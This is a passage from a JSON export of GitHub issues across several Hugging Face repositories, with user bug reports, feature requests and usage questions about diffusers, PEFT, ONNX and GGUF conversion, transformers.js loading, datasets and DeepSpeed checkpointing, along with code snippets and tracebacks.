"title": "Support IPAdapters for FLUX pipelines", "body": "### Model/Pipeline/Scheduler description\n\nIPAdapter for FLUX is available now, do you have any plans to add IPAdapter to FLUX pipelines?\n\n### Open source status\n\n- [X] The model implementation is available.\n- [X] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\nmodel implementation:\r\n* https://github.com/XLabs-AI/x-flux/blob/main/src/flux/xflux_pipeline.py#L55\r\n\r\nmodel weights:\r\n* https://huggingface.co/XLabs-AI/flux-ip-adapter-v2\r\n* https://huggingface.co/XLabs-AI/flux-ip-adapter\r\n", "url": "https://github.com/huggingface/diffusers/issues/9825", "state": "closed", "labels": [ "help wanted", "wip", "contributions-welcome", "IPAdapter" ], "created_at": "2024-10-31T23:07:32Z", "updated_at": "2024-12-21T17:49:59Z", "comments": 10, "user": "chenxiao111222" }, { "repo": "huggingface/diffusers", "number": 9822, "title": "Loading SDXL loras into Flux", "body": "### Describe the bug\n\nCurrently it's possible to load SDXL loras without warning into Flux.\n\n### Reproduction\n\nIs it possible for you to 
implement raising a warning (and an error when a boolean is active) when the list of layers here is zero:\r\n\r\nhttps://github.com/huggingface/diffusers/blob/41e4779d988ead99e7acd78dc8e752de88777d0f/src/diffusers/loaders/lora_pipeline.py#L1905\n\n### Logs\n\n_No response_\n\n### System Info\n\nubuntu\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9822", "state": "closed", "labels": [ "bug" ], "created_at": "2024-10-31T18:01:29Z", "updated_at": "2024-12-10T14:37:32Z", "comments": 8, "user": "christopher5106" }, { "repo": "huggingface/datasets", "number": 7268, "title": "load_from_disk", "body": "### Describe the bug\n\nI have data saved with save_to_disk. The data is big (700Gb). When I try loading it, the only option is load_from_disk, and this function copies the data to a tmp directory, causing me to run out of disk space. Is there an alternative solution to that?\n\n### Steps to reproduce the bug\n\nwhen trying to load data using load_from_disk after it was saved using save_to_disk \n\n### Expected behavior\n\nrunning out of disk space\n\n### Environment info\n\nlatest version", "url": "https://github.com/huggingface/datasets/issues/7268", "state": "open", "labels": [], "created_at": "2024-10-31T11:51:56Z", "updated_at": "2025-07-01T08:42:17Z", "comments": 3, "user": "ghaith-mq" }, { "repo": "huggingface/peft", "number": 2188, "title": "How to change the 'modules_to_save' setting when reloading a LoRA finetuned model", "body": "### System Info\n\n- `transformers` version: 4.36.2\r\n- Platform: Linux-3.10.0-1160.49.1.el7.x86_64-x86_64-with-glibc2.17\r\n- Python version: 3.9.19\r\n- Huggingface_hub version: 0.24.6\r\n- Safetensors version: 0.4.5\r\n- Accelerate version: 0.21.0\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.0.1+cu117 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n@BenjaminBossan\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n\r\n\r\n@BenjaminBossan 1. I use LoRA to finetune Whisper, and get model A. The settings are\r\n```\r\nconfig = LoraConfig(r=8, lora_alpha=16,target_modules=target_modules,modules_to_save=modules_to_save,lora_dropout=0.05, bias=\"none\")\r\nmodel = get_peft_model(model, config)\r\n```\r\nThen I change the source code of model A by adding an additional layer. I now want to train a model with this extra layer on top of the LoRA-trained model A. 
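\r\n\r\nConceptually, what I want is to extend the config before training/saving, something like this sketch (\"extra_layer\" is a stand-in for my new module's name):\r\n\r\n```python\r\nfrom peft import LoraConfig\r\n\r\nconfig = LoraConfig(\r\n    r=8,\r\n    lora_alpha=16,\r\n    target_modules=target_modules,\r\n    modules_to_save=modules_to_save + [\"extra_layer\"],  # track the new layer too\r\n    lora_dropout=0.05,\r\n    bias=\"none\",\r\n)\r\n```\r\n\r\nTo reload, 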
I use:\r\n```\r\nmodel_lora_path = \"../lora_path/\" + 'checkpoint-56416'\r\n\r\nmodel = PeftModel.from_pretrained(model,model_lora_path,ignore_mismatched_sizes=True).cuda()\r\n\r\n```\r\nBut the model LoraConfig's \"modules_to_save\" cannot be changed. I want to store the additional layer in 'adapter_model.safetensors'. How can I change my code?\r\nIn short, I want to add parameters to modules_to_save in LoraConfig during the reload process, based on the trained LoRA model, so that the additional layer can be stored.\r\n\r\nI tried to use `model.peft_config['default'].modules_to_save.extend(modules_to_save)` to add the \u201cmodules_to_save\u201d but it doesn't work.\n\n### Expected behavior\n\nChange the reloaded LoRA model's LoraConfig settings", "url": "https://github.com/huggingface/peft/issues/2188", "state": "closed", "labels": [], "created_at": "2024-10-30T12:26:37Z", "updated_at": "2024-12-08T15:03:37Z", "user": "dengchengxifrank" }, { "repo": "huggingface/huggingface.js", "number": 996, "title": "@huggingface/hub: how to use `modelInfo` with proper typing", "body": "The `modelInfo` method allows the caller to define which fields will be provided; it was added in https://github.com/huggingface/huggingface.js/pull/946\r\n\r\nhttps://github.com/huggingface/huggingface.js/blob/186ab738e2f9c7c3613330d45e44848186958815/packages/hub/src/lib/model-info.ts#L9-L11\r\n\r\nHere is an example \r\n\r\n```typescript\r\n$: const info = await modelInfo({\r\n\tname: \"openai-community/gpt2\",\r\n});\r\n$: console.log(info);\r\n{\r\n id: '621ffdc036468d709f17434d',\r\n name: 'openai-community/gpt2',\r\n private: false,\r\n task: 'text-generation',\r\n downloads: 13764131,\r\n gated: false,\r\n likes: 2334,\r\n updatedAt: 2024-02-19T10:57:45.000Z\r\n}\r\n```\r\n\r\nWe can ask for additional fields using `additionalFields`. Here is an example\r\n\r\n```typescript\r\n$: const info = await modelInfo({\r\n\tname: \"openai-community/gpt2\",\r\n additionalFields: ['author'],\r\n});\r\n$: console.log(info);\r\n{\r\n // ... omitted \r\n author: 'openai-community',\r\n}\r\n```\r\n\r\nHowever, I am not able to find the proper typing for the method call and its return type.\r\n\r\nThe return type of `modelInfo` is the following\r\n\r\nhttps://github.com/huggingface/huggingface.js/blob/186ab738e2f9c7c3613330d45e44848186958815/packages/hub/src/lib/model-info.ts#L21\r\n\r\nThe `additionalFields` type is the following\r\n\r\nhttps://github.com/huggingface/huggingface.js/blob/186ab738e2f9c7c3613330d45e44848186958815/packages/hub/src/lib/model-info.ts#L15\r\n\r\nBut I am getting an error when doing the following\r\n\r\n```typescript\r\nconst info = await modelInfo<'author'>({\r\n\tname: \"openai-community/gpt2\",\r\n\tadditionalFields: ['author'],\r\n});\r\n```\r\n\r\n`TS2344: Type string does not satisfy the constraint never`\r\n\r\nI am also interested in getting the full `ApiModelInfo` object, but I am not able to use the method with the right typing :thinking: .\r\n\r\ncc @coyotte508 :)\r\n", "url": "https://github.com/huggingface/huggingface.js/issues/996", "state": "closed", "labels": [], "created_at": "2024-10-30T10:41:36Z", "updated_at": "2024-10-30T12:02:47Z", "user": "axel7083" }, { "repo": "huggingface/diffusers", "number": 9802, "title": "Multidiffusion (panorama pipeline) is missing segmentation inputs?", "body": "I'm looking at the multidiffusion panorama pipeline page (https://huggingface.co/docs/diffusers/en/api/pipelines/panorama). 
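\r\n\r\nFor context, the usage the docs do show is the plain panorama case -- roughly this, taken from the documented example:\r\n\r\n```python\r\nimport torch\r\nfrom diffusers import DDIMScheduler, StableDiffusionPanoramaPipeline\r\n\r\nmodel_id = \"stabilityai/stable-diffusion-2-base\"\r\nscheduler = DDIMScheduler.from_pretrained(model_id, subfolder=\"scheduler\")\r\npipe = StableDiffusionPanoramaPipeline.from_pretrained(\r\n    model_id, scheduler=scheduler, torch_dtype=torch.float16\r\n).to(\"cuda\")\r\n\r\n# one global prompt for the whole canvas -- no per-region prompts or masks\r\nimage = pipe(\"a photo of the dolomites\", width=2048, height=512).images[0]\r\n```\r\n\r\n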
It looks like there is no way to specify the segmentation and associated prompts as in the original paper https://multidiffusion.github.io/ . If the code only has the panorama capability and not the region based generation using segmentation and prompts, then it should be extended to include the regional generation... If it does have region based generation then the documentation should be updated to show how to use it!", "url": "https://github.com/huggingface/diffusers/issues/9802", "state": "open", "labels": [ "stale" ], "created_at": "2024-10-29T20:15:15Z", "updated_at": "2024-12-24T15:03:30Z", "comments": 5, "user": "jloveric" }, { "repo": "huggingface/transformers.js", "number": 1000, "title": "Error while converting LLama-3.1:8b to ONNX", "body": "### Question\n\nHey @xenova,\r\n\r\nThanks a lot for this library! I tried converting [`meta-llama/Llama-3.1-8B-Instruct`](https://huggingface.co/meta-llama/Llama-3.1-8B-Instruct) to ONNX using the following command (on `main`):\r\n\r\n```bash\r\npython -m scripts.convert --quantize --model_id \"meta-llama/Llama-3.1-8B-Instruct\"\r\n```\r\n\r\nUsing the following `requirements.py` file (in a fresh env):\r\n```\r\ntransformers[torch]==4.43.4\r\nonnxruntime==1.19.2\r\noptimum==1.21.3\r\nonnx==1.16.2\r\nonnxconverter-common==1.14.0\r\ntqdm==4.66.5\r\nonnxslim==0.1.31\r\n--extra-index-url https://pypi.ngc.nvidia.com\r\nonnx_graphsurgeon==0.3.27\r\n```\r\n\r\nBut got the following error:\r\n```\r\nFramework not specified. Using pt to export the model.\r\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 4/4 [00:27<00:00, 6.99s/it]\r\nAutomatic task detection to text-generation-with-past (possible synonyms are: causal-lm-with-past).\r\nUsing the export variant default. Available variants are:\r\n - default: The default ONNX variant.\r\n\r\n***** Exporting submodel 1/1: LlamaForCausalLM *****\r\nUsing framework PyTorch: 2.5.0\r\nOverriding 1 configuration item(s)\r\n - use_cache -> True\r\nWe detected that you are passing `past_key_values` as a tuple and this is deprecated and will be removed in v4.43. Please use an appropriate `Cache` class (https://huggingface.co/docs/transformers/v4.41.3/en/internal/generation_utils#transformers.Cache)\r\n/site-packages/transformers/models/llama/modeling_llama.py:1037: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. 
We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if sequence_length != 1:\r\nTraceback (most recent call last):\r\n File \"/python3.10/runpy.py\", line 196, in _run_module_as_main\r\n return _run_code(code, main_globals, None,\r\n File \"/python3.10/runpy.py\", line 86, in _run_code\r\n exec(code, run_globals)\r\n File \"scripts/convert.py\", line 462, in \r\n main()\r\n File \"scripts/convert.py\", line 349, in main\r\n main_export(**export_kwargs)\r\n File \"/site-packages/optimum/exporters/onnx/__main__.py\", line 365, in main_export\r\n onnx_export_from_model(\r\n File \"/site-packages/optimum/exporters/onnx/convert.py\", line 1170, in onnx_export_from_model\r\n _, onnx_outputs = export_models(\r\n File \"/site-packages/optimum/exporters/onnx/convert.py\", line 776, in export_models\r\n export(\r\n File \"/site-packages/optimum/exporters/onnx/convert.py\", line 881, in export\r\n export_output = export_pytorch(\r\n File \"/site-packages/optimum/exporters/onnx/convert.py\", line 577, in export_pytorch\r\n onnx_export(\r\n File \"/site-packages/torch/onnx/__init__.py\", line 375, in export\r\n export(\r\n File \"/site-packages/torch/onnx/utils.py\", line 502, in export\r\n _export(\r\n File \"/site-packages/torch/onnx/utils.py\", line 1564, in _export\r\n graph, params_dict, torch_out = _model_to_graph(\r\n File \"/site-packages/torch/onnx/utils.py\", line 1117, in _model_to_graph\r\n graph = _optimize_graph(\r\n File \"/site-packages/torch/onnx/utils.py\", line 663, in _optimize_graph\r\n _C._jit_pass_onnx_graph_shape_type_inference(\r\nRuntimeError: The serialized model is larger than the 2GiB limit imposed by the protobuf library. Therefore the output file must be a file path, so that the ONNX external data can be written to the same directory. Please specify the output file name.\r\n```\r\n\r\nI saw this somewhat related issue #967, but the error didn't happen on the ONNX library (I think `v3` has been merged now).\r\n\r\nDo you have a fix for larger models such as this one? I also tried with [`meta-llama/Llama-3.2-3B-Instruct`](https://huggingface.co/meta-llama/Llama-3.2-3B-Instruct), but I got the same error, even though I see [here](https://huggingface.co/onnx-community/Llama-3.2-3B-Instruct) that you managed to convert it successfully.\r\n\r\nThanks!", "url": "https://github.com/huggingface/transformers.js/issues/1000", "state": "open", "labels": [ "question" ], "created_at": "2024-10-29T09:40:14Z", "updated_at": "2024-10-29T09:40:14Z", "user": "charlesbvll" }, { "repo": "huggingface/chat-ui", "number": 1545, "title": "Support markdown & code blocks in text input", "body": "## Describe your feature request\r\n\r\nWould be nice to support code block in the text input bar, that would make it easier to input code. 
We could also support basic markdown features like bold or italic, though maybe not headings.\r\n\r\n## Screenshots (if relevant)\r\n\r\nTry https://claude.ai/new to see an example of how this could work\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1545", "state": "open", "labels": [ "enhancement", "front" ], "created_at": "2024-10-28T08:42:58Z", "updated_at": "2024-11-11T20:26:32Z", "comments": 2, "user": "nsarrazin" }, { "repo": "huggingface/peft", "number": 2181, "title": "How can I export the model in GGUF format?", "body": "### Feature request\n\nThis is a good project; I just got it today and encountered some problems.\r\nHere is my code\r\n``` python\r\nfrom peft import AutoPeftModelForCausalLM\r\n\r\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\r\n\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(\"Qwen2-0.5B\")\r\n\r\n\r\nmodel = AutoModelForCausalLM.from_pretrained(\"model\")\r\nmodel.save_pretrained('directory')\r\n\r\n```\r\nI need a GGUF file to deploy with Ollama. When I export the model in GGUF format,\r\n\r\nI use \r\n```shell\r\n!python llama.cpp/convert_hf_to_gguf.py directory\r\n```\r\nbut it errors\r\n```\r\nINFO:hf-to-gguf:Loading model: directory\r\nTraceback (most recent call last):\r\n File \"/Users/xu756/AIGC/llama.cpp/convert_hf_to_gguf.py\", line 4436, in \r\n main()\r\n File \"/Users/xu756/AIGC/llama.cpp/convert_hf_to_gguf.py\", line 4404, in main\r\n hparams = Model.load_hparams(dir_model)\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n File \"/Users/xu756/AIGC/llama.cpp/convert_hf_to_gguf.py\", line 462, in load_hparams\r\n with open(dir_model / \"config.json\", \"r\", encoding=\"utf-8\") as f:\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\nFileNotFoundError: [Errno 2] No such file or directory: 'directory/config.json'\r\n\r\n\r\n```\r\n\r\n\"image\"\r\n\r\n\r\n\n\n### Motivation\n\nI need a GGUF file to deploy with Ollama.\r\nIs there any other way to deploy the PEFT model?\r\n\r\nThank you very much.\n\n### Your contribution\n\nI simply reproduced it above", "url": "https://github.com/huggingface/peft/issues/2181", "state": "closed", "labels": [], "created_at": "2024-10-26T13:51:45Z", "updated_at": "2024-10-26T13:59:18Z", "user": "xu756" }, { "repo": "huggingface/diffusers", "number": 9772, "title": "Support ControlNetPlus Union if not already supported", "body": "It's not clear if ControlNetPlus is already supported by diffusers https://github.com/xinsir6/ControlNetPlus/tree/main/pipeline which consists of union controlnet for SDXL. This model seems to support the only SDXL segmentation that I'm aware of. If not already supported, it should be!\r\n\r\nhttps://github.com/xinsir6/ControlNetPlus/tree/main\r\n", "url": "https://github.com/huggingface/diffusers/issues/9772", "state": "closed", "labels": [ "help wanted", "Good second issue", "contributions-welcome" ], "created_at": "2024-10-25T17:43:43Z", "updated_at": "2024-12-11T17:07:54Z", "comments": 5, "user": "jloveric" }, { "repo": "huggingface/transformers.js", "number": 994, "title": "Will these mistakes have an impact?", "body": "### Question\n\nAfter AutoProcessor.from_pretrained is loaded, an error occurred, and the error message is as follows:\r\n````typescript\r\nort-wasm-simd-thread\u2026jsep.wasm:0x10367e0 2024-10-25 20:11:31.705399 [W:onnxruntime:, session_state.cc:1168 VerifyEachNodeIsAssignedToAnEp] Some nodes were not assigned to the preferred execution providers which may or may not have an negative impact on performance. e.g. 
ORT explicitly assigns shape related ops to CPU to improve perf.\r\nort-wasm-simd-thread\u2026jsep.wasm:0x10367e0 2024-10-25 20:11:31.706300 [W:onnxruntime:, session_state.cc:1170 VerifyEachNodeIsAssignedToAnEp] Rerunning with verbose output on a non-minimal build will show node assignments.\r\n\r\n````", "url": "https://github.com/huggingface/transformers.js/issues/994", "state": "open", "labels": [ "question" ], "created_at": "2024-10-25T12:17:03Z", "updated_at": "2024-11-12T11:10:11Z", "user": "aidscooler" }, { "repo": "huggingface/transformers.js", "number": 993, "title": "How do I know the loading progress when loading .onnx file?", "body": "### Question\r\n\r\nBecause the .onnx file is large (about 170MB), I decided to show a loading progress indicator. Code as below: \r\n\r\n```` typescript \r\n const modelSettings = {\r\n   // Do not require config.json to be present in the repository\r\n   config: { model_type: \"custom\" },\r\n   subfolder: \"\",\r\n   process_callback: (progress) => {\r\n     modelLoadingProgress.value = Math.round(progress * 100);\r\n     console.log(\"model : \" + progress)\r\n   }\r\n };\r\n modelSettings.device = \"webgpu\";\r\n modelSettings.dtype = \"fp32\";\r\n model = await AutoModel.from_pretrained('briaai/RMBG-1.4', modelSettings);\r\n````\r\nI found that process_callback is never called. Can anyone help?", "url": "https://github.com/huggingface/transformers.js/issues/993", "state": "open", "labels": [ "question" ], "created_at": "2024-10-25T05:52:12Z", "updated_at": "2024-10-25T17:54:30Z", "user": "aidscooler" }, { "repo": "huggingface/finetrainers", "number": 70, "title": "How to set the resolutions when finetuning an I2V model?", "body": "I want to train a video diffusion model at lower resolutions. I set height_buckets=256 and width_buckets=256 in prepare_dataset.sh and processed the data. But I run into the following error while running the train_image_to_video_lora.sh script.\r\n\r\nValueError: It is currently not possible to generate videos at a different resolution that the defaults. 
This should only be the case with 'THUDM/CogVideoX-5b-I2V'.If you think this is incorrect, please open an issue at https://github.com/huggingface/diffusers/issues.\r\n\r\nHow do I set the hyperparameters to train with different resolutions?", "url": "https://github.com/huggingface/finetrainers/issues/70", "state": "closed", "labels": [], "created_at": "2024-10-25T05:36:19Z", "updated_at": "2024-11-11T18:27:29Z", "user": "TousakaNagio" }, { "repo": "huggingface/optimum", "number": 2080, "title": "\"ValueError: Trying to export a codesage model\" while trying to export codesage/codesage-large", "body": "### System Info\n\n```shell\noptimum 1.23.2\r\nMacOS 14.7\r\nPython 3.9\n```\n\n\n### Who can help?\n\n@michaelbenayoun \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nThis is a PyTorch embedding model released by AWS, as described here: https://www.linkedin.com/posts/changsha-ma-9ba7a485_yes-code-needs-its-own-embedding-models-activity-7163196644258226176-bFSW\r\n\r\nHoping I can use it with RAG under ollama for code understanding.\r\n\r\n```\r\nhuggingface-cli download codesage/codesage-large\r\noptimum-cli export onnx --model codesage/codesage-large codesage-large-onnx --task default --trust-remote-code\r\n```\r\n\r\nThe error: \"ValueError: Trying to export a codesage model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type codesage to be supported natively in the ONNX export.\"\r\n\r\nI am grateful for any help you can provide!\n\n### Expected behavior\n\nAn exported ONNX file.", "url": "https://github.com/huggingface/optimum/issues/2080", "state": "open", "labels": [ "bug" ], "created_at": "2024-10-25T05:27:22Z", "updated_at": "2024-10-25T05:27:22Z", "comments": 0, "user": "TurboEncabulator9000" }, { "repo": "huggingface/chat-ui", "number": 1543, "title": "RFC: enable multimodal and tool usage at once for OAI endpoints?", "body": "https://github.com/huggingface/chat-ui/blob/8ed1691ecff94e07d10dfb2874d3936d293f4842/src/lib/server/endpoints/openai/endpointOai.ts#L191C53-L191C65\r\n\r\nI just played around with combining both of these.\r\nWhat do you think about enabling tool calling only if no image is in the conversation?\r\nOtherwise we need to register models twice, once for multimodal and once for tool usage.\r\n\r\nA quick solution could be to check whether image_url is part of one of the messages, and if it is, skip the tools check.\r\n\r\nI struggled a bit because the upload file button was there but didn't do anything with the uploaded image until I checked the code.\r\n\r\n@nsarrazin wdyt?", "url": "https://github.com/huggingface/chat-ui/issues/1543", "state": "open", "labels": [], "created_at": "2024-10-24T17:37:50Z", "updated_at": "2024-10-24T17:39:14Z", "comments": 0, "user": "flozi00" }, { "repo": "huggingface/transformers.js", "number": 991, "title": "Loading models from \"non-URL\" locations in the browser", "body": "### Question\r\n\r\nHi! 
I have an application where the model files will be pre-loaded in a custom format into the browser's IndexedDB. Based on my understanding, transformers.js currently only supports loading models by URL and then caches them in the browser cache. Getting the model files from IndexedDB instead seems a little tricky, as it would require \"copying\" a lot of the loading logic.\r\n\r\nOther ideas were to use a ServiceWorker to intercept the model download and mock the response with the files from IndexedDB, or to write the files directly into the browser cache that transformers.js uses.\r\n\r\nBoth solutions seem hacky... So, before I embark on writing my own loading logic, I wanted to ask if you have any ideas or suggestions on how to approach this?\r\n\r\nThanks in advance!", "url": "https://github.com/huggingface/transformers.js/issues/991", "state": "open", "labels": [ "question" ], "created_at": "2024-10-24T12:18:19Z", "updated_at": "2024-12-04T19:30:07Z", "user": "AKuederle" }, { "repo": "huggingface/finetrainers", "number": 68, "title": "How to set the hyperparameters when finetuning an I2V model with LoRA?", "body": "File \"/home/shinji106/ntu/cogvideox-factory/training/dataset.py\", line 411, in __iter__ \r\n self.buckets[(f, h, w)].append(data) \r\nKeyError: (16, 320, 720)\r\n\r\nThe resolution is (13, 320, 480), so the key of self.buckets does not match the input.\r\nHow do I set the hyperparameters when running prepare_dataset.sh and train_image_to_video_lora.sh so that the key will match?", "url": "https://github.com/huggingface/finetrainers/issues/68", "state": "closed", "labels": [], "created_at": "2024-10-24T08:06:33Z", "updated_at": "2025-01-10T23:40:06Z", "user": "TousakaNagio" }, { "repo": "huggingface/datasets", "number": 7249, "title": "How to debug", "body": "### Describe the bug\n\nI wanted to use my own script to handle the processing, and followed the tutorial documentation by rewriting the MyDatasetConfig and MyDatasetBuilder (which contain the _info, _split_generators and _generate_examples methods) classes. Testing with simple data produced the processing results, but when I wished to do more complex processing, I found that I was unable to debug (even the simple samples were inaccessible). 
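\r\n\r\nAs a cross-check, here is a sketch for driving the builder in-process (assuming my_dataset.py is importable from the working directory). This avoids load_dataset importing the copy of the script that datasets places in its modules cache, which may be why breakpoints set in the original file never bind:\r\n\r\n```python\r\n# hypothetical debug helper, not part of the original report\r\nfrom my_dataset import MyDataset\r\n\r\nbuilder = MyDataset()\r\n# runs _info, _split_generators and _generate_examples in this process\r\nbuilder.download_and_prepare()\r\nds = builder.as_dataset(split=\"train\")\r\nprint(ds[:5])\r\n```\r\n\r\n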
There are no errors reported, and I am able to see the _info, _split_generators and _generate_examples print messages, but the breakpoints are never hit.\n\n### Steps to reproduce the bug\n\n# my_dataset.py\r\nimport json\r\nimport datasets\r\n\r\n\r\nclass MyDatasetConfig(datasets.BuilderConfig):\r\n    def __init__(self, **kwargs):\r\n        super(MyDatasetConfig, self).__init__(**kwargs)\r\n\r\n\r\nclass MyDataset(datasets.GeneratorBasedBuilder):\r\n    VERSION = datasets.Version(\"1.0.0\")\r\n\r\n    BUILDER_CONFIGS = [\r\n        MyDatasetConfig(\r\n            name=\"default\",\r\n            version=VERSION,\r\n            description=\"myDATASET\"\r\n        ),\r\n    ]\r\n\r\n    def _info(self):\r\n        print(\"info\")  # breakpoints\r\n        return datasets.DatasetInfo(\r\n            description=\"myDATASET\",\r\n            features=datasets.Features(\r\n                {\r\n                    \"id\": datasets.Value(\"int32\"),\r\n                    \"text\": datasets.Value(\"string\"),\r\n                    \"label\": datasets.ClassLabel(names=[\"negative\", \"positive\"]),\r\n                }\r\n            ),\r\n            supervised_keys=(\"text\", \"label\"),\r\n        )\r\n\r\n    def _split_generators(self, dl_manager):\r\n        print(\"generate\")  # breakpoints\r\n        data_file = \"data.json\"\r\n\r\n        return [\r\n            datasets.SplitGenerator(\r\n                name=datasets.Split.TRAIN, gen_kwargs={\"filepath\": data_file}\r\n            ),\r\n        ]\r\n\r\n    def _generate_examples(self, filepath):\r\n        print(\"example\")  # breakpoints\r\n        with open(filepath, encoding=\"utf-8\") as f:\r\n            data = json.load(f)\r\n        for idx, sample in enumerate(data):\r\n            yield idx, {\r\n                \"id\": sample[\"id\"],\r\n                \"text\": sample[\"text\"],\r\n                \"label\": sample[\"label\"],\r\n            }\r\n\r\n# main.py\r\nimport os\r\nos.environ[\"TRANSFORMERS_NO_MULTIPROCESSING\"] = \"1\"\r\n\r\nfrom datasets import load_dataset\r\n\r\ndataset = load_dataset(\"my_dataset.py\", split=\"train\", cache_dir=None)\r\n\r\nprint(dataset[:5])\n\n### Expected behavior\n\nPause at breakpoints while debugging\n\n### Environment info\n\nPyCharm\r\n", "url": "https://github.com/huggingface/datasets/issues/7249", "state": "open", "labels": [], "created_at": "2024-10-24T01:03:51Z", "updated_at": "2024-10-24T01:03:51Z", "user": "ShDdu" }, { "repo": "huggingface/sentence-transformers", "number": 3015, "title": "How to customize the dataloader? e.g. Custom Data Augmentation", "body": "Hi,\r\n\r\nI've always been used to the old .fit behaviour, where I could pass in a custom DataLoader, implementing the Dataset myself according to my needs.\r\n\r\nWith the new trainer interface, how am I supposed to tweak the dataloader? \r\n\r\nLet's say I want to apply some random transformations to the input text; how can I do it right now? 
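\r\n\r\nOne direction that might work (an untested sketch, assuming the v3 trainer consumes a datasets.Dataset, whose set_transform re-runs on every access):\r\n\r\n```python\r\nimport random\r\nfrom datasets import Dataset\r\n\r\ndef augment(batch):\r\n    # hypothetical word-dropout augmentation, applied lazily on each access\r\n    batch[\"anchor\"] = [\" \".join(w for w in t.split() if random.random() > 0.1) for t in batch[\"anchor\"]]\r\n    return batch\r\n\r\ntrain_ds = Dataset.from_dict({\r\n    \"anchor\": [\"A plane is taking off.\"],\r\n    \"positive\": [\"An air plane is taking off.\"],\r\n})\r\ntrain_ds.set_transform(augment)\r\nprint(train_ds[0])  # the transform runs here, not at build time\r\n```\r\n\r\n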
Of course, changing the original dataset, augmenting it statically, is a no-go.\r\n\r\nThanks!", "url": "https://github.com/huggingface/sentence-transformers/issues/3015", "state": "open", "labels": [], "created_at": "2024-10-23T17:11:13Z", "updated_at": "2024-11-15T10:32:35Z", "user": "msciancalepore98" }, { "repo": "huggingface/diffusers", "number": 9756, "title": "Could not find loading_adapters.ipynb", "body": "### Describe the bug\r\n\r\nwhile reading doc [Load adapters](https://huggingface.co/docs/diffusers/using-diffusers/loading_adapters)\r\n\r\nI tried to open in Colab to run an example on this page.\r\n\r\n\"open_colab\"\r\n\r\n\r\nIt will get Notebook not found on a new page.\r\n\r\nIt can't find loading_adapters.ipynb in [huggingface/notebooks](https://github.com/huggingface/notebooks)\r\n\r\n\r\n\r\n\r\n### Reproduction\r\n\r\nI follow the doc and write down a Google Colab [Google Colab loading_adapters](https://colab.research.google.com/drive/1pYpvsOf6U9CAZfughY1aUltUQTFsw4OI)\r\n\r\nCan I contribute a pr for this?\r\nDo you know how I can do this?\r\nCommit to notebook repo?\r\nOr something different?\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nGoogle Colab\r\n\r\n### Who can help?\r\n\r\n@stevhliu @sayakpaul", "url": "https://github.com/huggingface/diffusers/issues/9756", "state": "closed", "labels": [ "bug" ], "created_at": "2024-10-23T13:03:11Z", "updated_at": "2024-11-01T15:27:56Z", "comments": 6, "user": "thliang01" }, { "repo": "huggingface/accelerate", "number": 3190, "title": "How to save the optimizer state while enabling Deepspeed to save the model", "body": "### System Info\n\n```Shell\nUnrelated to configuration\n```\n\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n```\r\nunwrapped_model = accelerator.unwrap_model(transformer) \r\nunwrapped_model.save_pretrained(save_directory, \r\nsave_function=accelerator.save, \r\nstate_dict=accelerator.get_state_dict(transformer))\r\n```\r\nI am using Deepspeed Zero2.\r\nI want to save the model state and optimizer state, but the current `save_pretrained()` only supports saving the model state. How can I save the optimizer state? \n\n### Expected 